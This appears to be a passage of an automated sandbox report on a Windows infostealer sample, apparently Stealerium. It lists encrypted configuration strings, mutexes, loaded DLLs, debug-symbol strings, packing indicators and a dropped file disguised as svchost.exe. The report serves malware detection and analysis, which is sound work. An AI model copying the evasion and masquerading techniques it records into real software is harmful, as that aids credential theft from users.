'wgd2wjr/2hNODgbQ0BEThoG3wiffCpRKwF1WR07pSe/Z/+gxsjy+8tX+Ri+rUc1pa5ekn0ztjd5SLrNHTaelug=='
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, Settings.csBase64 encoded string: 'SM7qHNBbEWqlNZPSlGYWkvdq+nx+ky85iVQ6KF3TfqFi7H/qad+wUbwVscOBjiGi8HLKgEIT6RGEVxRAVewGdw==', 'Q4KUFlUVHZ8A+kYrLv73HG5bB0cuH5spClpi8zNpIVRY7OujQr6NA1gnvqHHGUlh2Mj15u23AxRh+yW437nyqQ==', 'Oo5ZpBW/18EPNZ3+RAYWZfD4brLP8XhnTTvj/ogna6oN/AUj0hchRePdWSu6Ke3sO6hqT2hjgQZBOXyMvabQmw==', 'NrTdAvgbWTVfKUm4lcJWI11BTTKpyJFIq3rDEQ2KO3sthZSLtKkYESoV51GmjRrf82ZAMYm7t8o7L4zhreP4I1MgOgRLHY+vDGr1brGHXEKeQaono+64Ny4e36vnfTRJYNtDw8DCLOehIHbN0CyowyXIQjilNTtXLgPNy9EnSLzW+sW97NeDiIbnbj88sqRYG+bvheFUs7cJRxhdhztN9BCu0cvTTePSjuq49uYj29MDx/QY2Ijr2NznfCf+c2E3uV7c8kv+2N5wtSrpgAxIBQ3nhBbRlpeQP9zV6ndDJHd+T4Ps2eZa0cKH2VO4QQu1h5TffE4oL03sjyfA5daiD1WRMqb2GK2Y4NYo/6WPVahoOSTSJZPV8VxrgpSCxosIriQ27GVgdAEWGe5E+JewahIzZ2RzQSMgk5PNyQnYji5Wqz3c9O55k8biK+LfY0pfeinxdIb29b5vOjyyBOblYDUJSrPaGXMyeOvE4FywNg0Ic72pP3yxWOia3AChmYUXCWCV37oJbRRYZR2xeTIi3KQYDGMJTEp3gIVA0Qjka0C0LE/U5Yu1ADGhFDXjiql0/SNcdnQABJI7ZnHuhS/FnEXblhFO3q9E1n09Pv24gjw92Dj3BOulS4BRcfl/jup5/XkPQBcROcMc+vjdWL27aWLY7qRJZnAe43BMZhuO2zUYjr+TFkaWCcTMaZOXRK5RojZq2yO76nTsVuJdHMLGc7/DteuZejZyc8sM3S+8fbbMVXBf3wi/viNekmyxh6meFRRDTwNjIszscsYuMjQ7LywYU1rVtz636woULSCpGgHP0pe8w+ivkqIthTkbZeZDNLCpGK+fl0e4YbAYVNPYrUYd1117f61xVXmnbXJE7z0tE9DPipxdTP6gW4FJuEGWYh1lB7PkKeCYZJprCvTA7/M+PyxxdvAFd98/KCQGYM2+v6lGfiHghhgFZK33C6OUqZNMNvKqFtNAk4bEJZDFgEPzV0B8yicOywfW5wREbMkH121Wza2dGQ7GqIR/iSQNbCl29hNzMt6gkP6k4ltxBcCQA7pwFjasnXR6QdH0H7s=', 'Ww1sewE85HmNt9n7eSoa6Xcmo++JMonP7vDDbXJu+uyuIzYlTqq5HFONO5nrV8R+WFo+/cVzdNJGyvmRmGjvXUdAeMA3Vc7mRjt3zRK426/JCu41mQGVgL3IdSMAARuzIsucp9IZFPAolr8Pmp3/EsF1hdwp2sJLIaAR4XsdeHdi0Ng8VYVv3yPOl0eqOQlxPdBB0rc5/yFhmi1qES5TYRRg6D+1Vs/+aX2qVQhliiTBZerF1l4ePvJngWrhv5dASnmu/1RROX3S2wmMRUPet9HClokBDOno48++HfxnIbk=', 'YVHVzoV/Ngy7JpMYK2CUMnXKv1ISMfvG8sTCwCqopLZNi0mI0A1YFROl3IxU8Vt1N0tWSChZxaHJq8I1S843VQ==', 'LepKMSG4Rt/hsHJyNkB62nWYJbCGm8GSmSOwtZ4HTumPBLrzNTf+DXas3vWNwCzXA/fNu9pBKKs7Fp9XhI5pSw==', 'wgd2wjr/2hNODgbQ0BEThoG3wiffCpRKwF1WR07pSe/Z/+gxsjy+8tX+Ri+rUc1pa5ekn0ztjd5SLrNHTaelug=='
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, Settings.csBase64 encoded string: 'SM7qHNBbEWqlNZPSlGYWkvdq+nx+ky85iVQ6KF3TfqFi7H/qad+wUbwVscOBjiGi8HLKgEIT6RGEVxRAVewGdw==', 'Q4KUFlUVHZ8A+kYrLv73HG5bB0cuH5spClpi8zNpIVRY7OujQr6NA1gnvqHHGUlh2Mj15u23AxRh+yW437nyqQ==', 'Oo5ZpBW/18EPNZ3+RAYWZfD4brLP8XhnTTvj/ogna6oN/AUj0hchRePdWSu6Ke3sO6hqT2hjgQZBOXyMvabQmw==', 'NrTdAvgbWTVfKUm4lcJWI11BTTKpyJFIq3rDEQ2KO3sthZSLtKkYESoV51GmjRrf82ZAMYm7t8o7L4zhreP4I1MgOgRLHY+vDGr1brGHXEKeQaono+64Ny4e36vnfTRJYNtDw8DCLOehIHbN0CyowyXIQjilNTtXLgPNy9EnSLzW+sW97NeDiIbnbj88sqRYG+bvheFUs7cJRxhdhztN9BCu0cvTTePSjuq49uYj29MDx/QY2Ijr2NznfCf+c2E3uV7c8kv+2N5wtSrpgAxIBQ3nhBbRlpeQP9zV6ndDJHd+T4Ps2eZa0cKH2VO4QQu1h5TffE4oL03sjyfA5daiD1WRMqb2GK2Y4NYo/6WPVahoOSTSJZPV8VxrgpSCxosIriQ27GVgdAEWGe5E+JewahIzZ2RzQSMgk5PNyQnYji5Wqz3c9O55k8biK+LfY0pfeinxdIb29b5vOjyyBOblYDUJSrPaGXMyeOvE4FywNg0Ic72pP3yxWOia3AChmYUXCWCV37oJbRRYZR2xeTIi3KQYDGMJTEp3gIVA0Qjka0C0LE/U5Yu1ADGhFDXjiql0/SNcdnQABJI7ZnHuhS/FnEXblhFO3q9E1n09Pv24gjw92Dj3BOulS4BRcfl/jup5/XkPQBcROcMc+vjdWL27aWLY7qRJZnAe43BMZhuO2zUYjr+TFkaWCcTMaZOXRK5RojZq2yO76nTsVuJdHMLGc7/DteuZejZyc8sM3S+8fbbMVXBf3wi/viNekmyxh6meFRRDTwNjIszscsYuMjQ7LywYU1rVtz636woULSCpGgHP0pe8w+ivkqIthTkbZeZDNLCpGK+fl0e4YbAYVNPYrUYd1117f61xVXmnbXJE7z0tE9DPipxdTP6gW4FJuEGWYh1lB7PkKeCYZJprCvTA7/M+PyxxdvAFd98/KCQGYM2+v6lGfiHghhgFZK33C6OUqZNMNvKqFtNAk4bEJZDFgEPzV0B8yicOywfW5wREbMkH121Wza2dGQ7GqIR/iSQNbCl29hNzMt6gkP6k4ltxBcCQA7pwFjasnXR6QdH0H7s=', 'Ww1sewE85HmNt9n7eSoa6Xcmo++JMonP7vDDbXJu+uyuIzYlTqq5HFONO5nrV8R+WFo+/cVzdNJGyvmRmGjvXUdAeMA3Vc7mRjt3zRK426/JCu41mQGVgL3IdSMAARuzIsucp9IZFPAolr8Pmp3/EsF1hdwp2sJLIaAR4XsdeHdi0Ng8VYVv3yPOl0eqOQlxPdBB0rc5/yFhmi1qES5TYRRg6D+1Vs/+aX2qVQhliiTBZerF1l4ePvJngWrhv5dASnmu/1RROX3S2wmMRUPet9HClokBDOno48++HfxnIbk=', 'YVHVzoV/Ngy7JpMYK2CUMnXKv1ISMfvG8sTCwCqopLZNi0mI0A1YFROl3IxU8Vt1N0tWSChZxaHJq8I1S843VQ==', 'LepKMSG4Rt/hsHJyNkB62nWYJbCGm8GSmSOwtZ4HTumPBLrzNTf+DXas3vWNwCzXA/fNu9pBKKs7Fp9XhI5pSw==', 'wgd2wjr/2hNODgbQ0BEThoG3wiffCpRKwF1WR07pSe/Z/+gxsjy+8tX+Ri+rUc1pa5ekn0ztjd5SLrNHTaelug=='
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Lu4421.exe.15b6457e868.1.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                        Source: svchost.exe.0.dr, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                        Source: 0.2.Lu4421.exe.15b64564428.2.raw.unpack, DInvokeCore.csSuspicious method names: .DInvokeCore.DynamicAPIInvoke
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/9@3/3
                        Source: C:\Users\user\Desktop\Lu4421.exeFile created: C:\Users\user\AppData\Local\267bb600791eee4c354dd856956b4399Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: NULL
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\etb3t1tr5n
                        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6768
                        Source: C:\Users\user\Desktop\Lu4421.exeMutant created: \Sessions\1\BaseNamedObjects\6617MJ9BAV2LEI4BHN6F
                        Source: C:\Users\user\Desktop\Lu4421.exeFile created: C:\Users\user\AppData\Local\Temp\Stealerium-Latest.logJump to behavior
                        Source: Lu4421.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Lu4421.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Lu4421.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Lu4421.exeReversingLabs: Detection: 68%
                        Source: Lu4421.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: Lu4421.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                        Source: C:\Users\user\Desktop\Lu4421.exeFile read: C:\Users\user\Desktop\Lu4421.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Lu4421.exe "C:\Users\user\Desktop\Lu4421.exe"
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
                        Source: C:\Users\user\Desktop\Lu4421.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\Lu4421.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Lu4421.exeStatic file information: File size 5865472 > 1048576
                        Source: Lu4421.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x394000
                        Source: Lu4421.exeStatic PE information: Raw size of iubcysyr is bigger than: 0x100000 < 0x1ff400
                        Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Management.pdbHl source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed source: Lu4421.exe
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: !costura.polly.core.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: re.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Users\user\Desktop\Lu4421.PDB source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe, 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceProcess.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb:l source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: mscorlib.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.ServiceProcess.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Xml.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdbpHN source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Xml.pdb* source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed|||Newtonsoft.Json.Bson.pdb|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F|26968 source: Lu4421.exe
                        Source: Binary string: System.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: Lu4421.exe, Lu4421.exe, 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp
                        Source: Binary string: System.Net.Http.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Configuration.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: PresentationFrameworkib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C880000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.Xml.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: Lu4421.exe
                        Source: Binary string: costura.newtonsoft.json.bson.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.wpf.ui.pdb.compressed|||Wpf.Ui.pdb|299223DFCADFE8FD464F218CE110C10266AB22B0|139288 source: Lu4421.exe
                        Source: Binary string: mscorlib.pdb source: Lu4421.exe, 00000000.00000002.2048016614.0000015B7C892000.00000004.00000020.00020000.00000000.sdmp, Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed source: Lu4421.exe
                        Source: Binary string: System.Net.Http.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Management.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.pdb source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp, WER74C5.tmp.dmp.4.dr
                        Source: Binary string: costura.polly.pdb.compressed|||Polly.pdb|6E4429D15FBCD96C44E391E109CB500EC2508333|83400 source: Lu4421.exe
                        Source: Binary string: costura.polly.core.pdb.compressed|||Polly.Core.pdb|C1D3F2BA348EA2F6635B8F5961AD127E831487C6|66148 source: Lu4421.exe
                        Source: Binary string: costura.icsharpcode.sharpziplib.pdb.compressed|||ICSharpCode.SharpZipLib.pdb|E1FCA83029D1440F54FB3747B240365A6DF0A598|121652 source: Lu4421.exe
                        Source: Binary string: System.Core.pdbk source: Lu4421.exe, 00000000.00000002.2043697205.0000015B6460C000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdb source: WER74C5.tmp.dmp.4.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER74C5.tmp.dmp.4.dr

                        Data Obfuscation

                        barindex
                        Detected unpacking (changes PE section rights)
                        Source: C:\Users\user\Desktop\Lu4421.exeUnpacked PE file: 0.2.Lu4421.exe.b50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;iubcysyr:EW;tpxtcrvz:EW;.taggant:EW; vs :ER;.rsrc:W;
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: Lu4421.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.Lu4421.exe.b50000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Lu4421.exe PID: 6768, type: MEMORYSTR
                        Source: Lu4421.exeStatic PE information: 0xFFBE84BF [Sat Dec 19 14:25:03 2105 UTC]
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: svchost.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1bab2
                        Source: Lu4421.exeStatic PE information: real checksum: 0x5a3d95 should be: 0x5a3f7c
                        Source: Lu4421.exeStatic PE information: section name:
                        Source: Lu4421.exeStatic PE information: section name: .idata
                        Source: Lu4421.exeStatic PE information: section name:
                        Source: Lu4421.exeStatic PE information: section name: iubcysyr
                        Source: Lu4421.exeStatic PE information: section name: tpxtcrvz
                        Source: Lu4421.exeStatic PE information: section name: .taggant
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_011AAE84 push rdx; retf 0_2_011AB271
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_011AC0A0 push rcx; retf 0_2_011AC184
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7F23B0 push eax; iretd 0_2_00007FFD9B7F24A1
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7F2490 push eax; iretd 0_2_00007FFD9B7F24A1
                        Source: C:\Users\user\Desktop\Lu4421.exeCode function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
                        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 1_2_00007FFD9B7D77DD push ecx; retf 1_2_00007FFD9B7D785C

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with benign system names
                        Source: C:\Users\user\Desktop\Lu4421.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
